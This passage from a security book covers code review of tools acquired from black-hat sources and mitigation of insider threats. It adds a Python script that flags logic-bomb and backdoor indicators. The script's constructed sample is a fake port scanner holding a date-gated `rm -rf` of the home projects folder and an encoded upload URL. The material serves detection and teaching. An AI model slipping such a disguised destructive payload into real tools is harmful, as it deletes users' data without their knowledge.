Keep Your Enemies Closer ◾ 251
impossible to hide from a skilled code reviewer. Code reviews are your best defense against
logic bombs, backdoors, and other types of malicious code in tools you acquire from black-hat
sources, so much so that we recommend decompiling binaries and reviewing the resulting
source code when no source code is available for a particular tool. Bear in mind that
decompilation is lossy (names, types, and some control flow are reconstructed rather than
recovered), so the decompiled output is an aid to reading the binary, not a substitute for the
original source. The issue with code reviews is usually one of resourcing. Code reviews are
tedious and time consuming and require a rather sophisticated set of skills, so there is a
trade-off. Smaller utilities and tools should be source code reviewed. For larger applications,
an execution review (running the tool in an instrumented, isolated environment and observing
its file, process, and network activity) combined with other mitigating controls such as
sandboxing and IPS may prove to be more cost effective.
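As an added example (not from the chapter), the following Python script is the kind of first-pass static triage a reviewer might run over an acquired tool's source before the manual read. It flags the ingredients of logic bombs and backdoors (time-gated branches, shell or network calls, dynamic code execution, encoded string literals), decodes long base64 literals so hidden hosts or commands surface in the report, and pairs each time trigger with any action that follows it within a few lines. The indicator names, the regular expressions, and the sample "port scanner" are this example's own constructions; every hit is a place to read, not proof of malice.

```python
"""First-pass triage of an acquired tool's source for logic-bomb and backdoor
indicators. Heuristics only: they tell the reviewer where to read first."""
import base64
import binascii
import re

# Heuristic indicators. Names and patterns are this example's own choices.
INDICATORS = {
    "time_trigger": re.compile(r"\b(?:datetime|date|time)\.(?:now|today|time|localtime)\s*\("),
    "network_egress": re.compile(r"\b(?:socket\.socket|urllib\.request|requests\.(?:get|post)|http\.client)\b"),
    "dynamic_exec": re.compile(r"\b(?:exec|eval)\s*\("),
    "shell_spawn": re.compile(r"\b(?:os\.system|subprocess\.(?:Popen|call|run))\s*\("),
    "obfuscated_payload": re.compile(r"\bbase64\.b64decode\s*\("),
}
# Long base64-looking string literals get decoded so an encoded host or command
# appears in the report instead of staying hidden behind the encoding.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_literal(token):
    """Return the decoded text of a base64 literal if it is printable ASCII, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def triage(source):
    """Scan source text line by line. Each finding is a dict with the 1-based
    line number, the indicator name and the flagged (or decoded) text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):  # comments cannot execute
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append({"line": lineno, "indicator": name, "text": stripped})
        for match in B64_LITERAL.finditer(line):
            decoded = decode_literal(match.group(1))
            if decoded:
                findings.append({"line": lineno, "indicator": "decoded_literal", "text": decoded})
    return findings


def logic_bomb_candidates(findings, window=6):
    """Pair each time trigger with any action (shell, exec, network) that follows
    within `window` lines: the classic shape of a date-gated payload."""
    actions = {"shell_spawn", "dynamic_exec", "network_egress"}
    hits = []
    for trig in (f for f in findings if f["indicator"] == "time_trigger"):
        for act in findings:
            if act["indicator"] in actions and trig["line"] < act["line"] <= trig["line"] + window:
                hits.append((trig["line"], act["line"], act["indicator"]))
    return hits


# Constructed sample: a plausible port scanner carrying a date-gated destructive
# command and an encoded upload URL. The literal is generated here so the sample
# stays self-consistent; this is not a real tool.
_ENCODED_URL = base64.b64encode(b"http://results-upload.example.com/push").decode()
SAMPLE_TOOL = f'''\
import socket
import sys
import os
import base64
from datetime import date

TARGET = sys.argv[1]
PORTS = range(1, 1024)

def scan(host):
    open_ports = []
    for port in PORTS:
        s = socket.socket()
        s.settimeout(0.2)
        if s.connect_ex((host, port)) == 0:
            open_ports.append(port)
        s.close()
    return open_ports

def _housekeeping():
    # "cache maintenance"
    if date.today().month == 12 and date.today().day == 24:
        os.system("rm -rf ~/.cache/scan-results ~/projects")
    home = base64.b64decode("{_ENCODED_URL}").decode()
    return home

if __name__ == "__main__":
    print(scan(TARGET))
    _housekeeping()
'''

if __name__ == "__main__":
    report = triage(SAMPLE_TOOL)
    for f in report:
        print(f"line {f['line']:>3}  {f['indicator']:<18} {f['text']}")
    for trig, act, kind in logic_bomb_candidates(report):
        print(f"logic-bomb candidate: trigger at line {trig}, {kind} at line {act}")
```

Run against the sample, the report flags the scanner's own socket use (legitimate, which is why a human still reads the context), the December 24 branch, the `os.system` call directly beneath it, and the decoded upload URL; the trigger/action pairing then points the reviewer at lines 22 and 23 first.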
The following actions are recommended for the malicious content implantation control
objective:
1. Identify resources that can assist with code reviews and tool evaluations.
2. Develop appropriate procedures for handling malicious content so that it is contained at all
times, including management and chain-of-custody controls for all media that carry malicious
code.
3. Gather and test the recommended best practices for high-security hardening of the platforms
you are using for reconnaissance.
4. Determine the equipment and resources required to set up an isolated reconnaissance
capability, including capital and running expense estimates.
5. Acquire and test potential security controls for detecting malicious content, behavior, or results.
6. Acquire and test system recovery or rebuild tools that permit quick recovery of a system
that has been compromised.
Conclusion
This chapter covered two important personnel-related tactics. The first, hire a hacker, discussed
the merits of hiring clever people to assess security controls, improve security products, and
reconnoiter future threats or exploits. The second tactic, countering insider threats, discussed
control objectives for mitigating the risks associated with malicious insider activity. The use
of "hackers" in the context of IT security depends entirely on the objectives the organization
is trying to achieve. Using white-hats to improve the security function of your products and
services is good practice. Security professionals generally consider employing "reformed"
black-hat hackers to be a bad idea, although there does not appear to be any body of evidence
showing that the practice substantially increases risk. In truth, all employees have the potential
to commit malicious acts, and insiders typically do three times the damage that an external
attacker might.
Malicious insiders have authorized access that bypasses most network and host-based controls;
weaknesses in operating system and application controls exacerbate the problem by granting
users access to inordinate amounts of data. Management complacency, corporate culture,
empowerment, erratic enforcement, and missing supervisory skills add to the problem. Company
processes, including audit, hiring, and termination practices, supervisory controls, and incident
response, are often inept and require technologies to manage user identities, collate physical and
logical accesses, and detect unauthorized activities. The problem is systemic; the industry is only
now starting to recognize the tremendous risk that insider malfeasance represents to companies,
agencies, and the public. This isn't a hired hacker problem; it's an "everybody problem," and until
technology catches up with the need, the best mitigation we have at hand is competent
supervision: nurture and promote it.